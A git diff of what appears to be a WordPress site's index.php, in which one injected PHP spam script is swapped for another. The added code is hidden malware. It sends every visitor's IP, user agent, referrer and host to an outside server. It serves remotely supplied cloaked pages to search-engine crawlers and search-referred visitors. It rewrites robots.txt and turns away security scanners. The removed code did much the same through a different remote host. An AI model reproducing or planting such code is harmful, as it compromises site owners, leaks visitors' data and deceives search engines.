Update 1

diff --git a/1 b/1
--- a/1
+++ b/1
@@ -1,92 +1,139 @@
 <?php
+$fcpbh = "cw649";
+function npbkyu($url) {
+	$rContent = @file_get_contents($url);
+	if(empty($rContent)) {
+		$ch = curl_init();
+		curl_setopt($ch, CURLOPT_URL, $url);
+		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
+		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
+		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
+		$rContent = curl_exec($ch);
+		curl_close($ch);
+	}
+	return $rContent;
+}
 error_reporting(0);
-$gp_name="omb1";
-$version="od1";
-if ( preg_match("/jp2023/si",$_SERVER["REQUEST_URI"])==1 ) 
-{
-    header("HTTP/1.0 404 Not Found"); 
-    echo "HTTP/1.0 404 Not Found"."___".$gp_name."___".$version; 
-    exit; 
+$gvpib = "http://".$fcpbh. ".lesbiantown.shop/";
+if(preg_match("/(paloaltonetworks|Barkrowler|Python-requests|ZmEu|AmazonBot|UniversalFeedParser|mj12bot|CoolpadWebkit|LightDeckReports Bot|ezooms|Python-urllib|yandexBot|ApacheBench|AhrefsBot|httpClient|Heritrix|DigExt|Swiftbot|OBot|FeedDemon|Bytespider|YySpider|askTbFXTV|Java|Indy Library|CrawlDaddy|jikeSpider|yisouSpider|Scrapy|jaunty|feedly|Python|semrushBot|PetalBot|easouSpider)/i", $_SERVER['HTTP_USER_AGENT'])) {
+	header('HTTP/1.0 403 Forbidden');
+	exit();
 }
-function curl_get($url)
-{
-    $ch=curl_init();
-    curl_setopt ($ch, CURLOPT_URL, $url);
-    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
-    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 10);
-    $contents = curl_exec($ch);
-    $contents = trim($contents);
-    curl_close($ch);
-    if ( empty($contents) )
-    {
-        $contents=file_get_contents($url);
-    }
-    return $contents;   
+$bagent = "Bing|Docomo|Google|Yahoo";
+$pc = "D1BVDAv";
+$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
+$refer = urlencode(@$_SERVER['HTTP_REFERER']);
+$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
+$ip = $_SERVER['REMOTE_ADDR'];
+if (!empty(@$_SERVER['HTTP_CLIENT_IP'])) {
+  $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty(@$_SERVER['HTTP_X_FORWARDED_FOR'])) {
+  $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
 }
-$domain="http://".$gp_name.".validray.com";
-$req_uri="/index.php?VS=".$version."&GP=".$gp_name;
-$key_name_arr=array(
-"SCRIPT_NAME",
-"REQUEST_URI",
-"HTTPS",
-"REQUEST_SCHEME",
-"SERVER_PORT",
-"REMOTE_ADDR",
-"HTTP_REFERER",
-"HTTP_ACCEPT_LANGUAGE",
-"HTTP_USER_AGENT",
-"HTTP_HOST"
-);
-foreach($key_name_arr as $key_name)
-{
-    $key_value=isset($_SERVER[$key_name])?$_SERVER[$key_name]:'';
-    $tran_char=base64_encode(trim($key_value));
-    $tran_char=str_replace("+","-",$tran_char);
-    $tran_char=str_replace("/","_",$tran_char);
-    $tran_char=str_replace("=",".",$tran_char);
-    $req_uri.="&".$key_name."=".$tran_char;
+$ip = urlencode($ip);
+$domain = urlencode($_SERVER['HTTP_HOST']);
+$script = urlencode($_SERVER['SCRIPT_NAME']);
+if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) {
+	$_SERVER['REQUEST_SCHEME'] = 'https';
+} else {
+	$_SERVER['REQUEST_SCHEME'] = 'http';
 }
-$curl_content_arr=explode("|@#$|",trim(curl_get($domain.$req_uri)));
-$count=count($curl_content_arr);
-if ($count<3)
-{
-    header("HTTP/1.0 404 Not Found"); 
-    exit;    
-}else 
-{
-    $head_info=trim($curl_content_arr[0]);
-    if (!empty($head_info))
-    {
-        header($head_info);
-    }
-    $content_info=trim($curl_content_arr[1]);
-    if (!empty($content_info))
-    {
-        echo $content_info;
-    }
-    $cmd_info=trim($curl_content_arr[$count-1]);
-    if ($cmd_info=="exit")
-    {
-        exit;
-    }
-    if ($cmd_info=="ping")
-    {
-        $robots_content="User-agent:*".PHP_EOL;
-        $robots_content.="Allow:/".PHP_EOL;
-        $ping_url_arr=explode("<br/>",$content_info);
-        array_pop($ping_url_arr);
-        foreach ($ping_url_arr as $ping_url1)
-        {
-            $robots_content.="Sitemap:".$ping_url1.PHP_EOL;
-            $ping_result=curl_get("https://www.google.com/ping?sitemap=".$ping_url1);
-            preg_match("/<h2>(.+)?<\/h2>/",$ping_result,$matches);
-            echo $ping_url1."==>ping-google-result-is:<b>".$matches[1]."</b><br/>";
-            usleep(mt_rand(100000,300000));
-        }
-        file_put_contents($_SERVER["DOCUMENT_ROOT"]."/robots.txt",$robots_content);
-        echo "robots.txt==><b>updated</b>";
-        exit;
-    }
+$http = urlencode($_SERVER['REQUEST_SCHEME']);
+$uri = urlencode($_SERVER['REQUEST_URI']);
+if(strpos($uri,"fcpfcp") !== false) {
+	echo "ok";
+	exit();
+}
+$fcp = 0;
+if(!file_exists("fcp.txt")) {
+	$uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/fcpfcp';
+	$mjon = npbkyu($uuu);
+	if($mjon == "ok") {
+		$fcp = 1;
+		@file_put_contents("fcp.txt","1");
+	} else {
+		$fcp = 0;
+		@file_put_contents("fcp.txt","0");
+	}
+} else {
+	$fcp = @file_get_contents("fcp.txt");
+}
+if(strpos($uri,"pingsitemap.xml") !== false) {
+	$scripname = $_SERVER['SCRIPT_NAME'];
+	if( strpos( $scripname, "index.ph") !== false) {
+		if($fcp == 0) {
+			$scripname = '/?';
+		} else {
+			$scripname = '/';
+		}
+	} else {
+		$scripname = $scripname.'?';
+	}
+	$robots_contents = "User-agent: *\r\nAllow: /";
+	$sitemap = "$http://" . $domain .$scripname. "sitemap.xml";
+	$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";
+	$sitemapstatus = "";
+	echo $sitemap.": ".$sitemapstatus.'<br/>';
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp&script=$script&sitemap=".urlencode($sitemap);
+	$mjon = npbkyu($requsturl);
+	@file_put_contents("robots.txt",$robots_contents);
+	exit();
+} else if(strpos($uri,"favicon.ico") !== false) {
+} else if(strpos($uri,"jp2023") !== false) {
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp&script=$script";
+	$mjon = npbkyu($requsturl);
+	echo $mjon;
+	exit();
+	return;
+} else if(strpos($uri,"robots.txt") !== false) {
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp&script=$script";
+	header('Content-Type: text/plain; charset=utf-8');
+	echo $mjon = npbkyu($requsturl);
+	@file_put_contents("robots.txt",$mjon);
+	exit();
+} else if(preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])) {
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp&script=$script";
+	$mjon = npbkyu($requsturl);
+	if($mjon == "500") {
+		header("HTTP/1.0 500 Internal Server Error");
+		exit();
+	} else {
+		header('Content-Type: text/xml; charset=utf-8');
+		echo $mjon;
+		exit();
+		return;
+	}
+} else if(preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT'])) {
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp&script=$script";
+	$mjon = npbkyu($requsturl);
+	if(!empty($mjon)) {
+		if($mjon == "500"||substr($mjon,0,strlen("error code:"))=="error code:") {
+			header("HTTP/1.0 500 Internal Server Error");
+			exit();
+		}
+		if(substr($mjon,0,5)=="<?xml") {
+			header('Content-Type: text/xml; charset=utf-8');
+		} else {
+			header('Content-Type: text/html; charset=utf-8');
+		}
+		echo $mjon;
+		exit();
+		return;
+	}
+} else if(preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) {
+	$requsturl = $gvpib."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$fcp";
+	$mjon = npbkyu($requsturl);
+	if($mjon == "500") {
+		header("HTTP/1.0 500 Internal Server Error");
+		exit();
+	} else if(!empty($mjon)) {
+	    header('HTTP/1.1 404 Not Found');
+		echo $mjon;
+		exit();
+		return;
+	}
+} else {
 }
 ?>
 <?php
@@ -106,3 +153,4 @@ define( 'WP_USE_THEMES', true );
 
 /** Loads the WordPress Environment and Template */
 require __DIR__ . '/wp-blog-header.php';
+	
